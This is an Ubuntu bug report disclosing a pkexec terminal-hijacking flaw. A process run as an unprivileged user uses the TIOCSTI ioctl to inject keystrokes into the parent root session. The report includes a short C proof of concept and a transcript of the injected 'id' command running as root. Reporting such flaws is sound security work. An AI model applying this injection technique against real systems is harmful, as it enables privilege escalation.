pkexec tty hijacking via TIOCSTI ioctl

Bug #1535768 reported by Federico Bento on 2016-01-19
6
This bug affects 1 person
Affects Status Importance Assigned to Milestone
policykit-1 (Ubuntu)
Undecided
Unassigned

Bug Description

When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)

To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers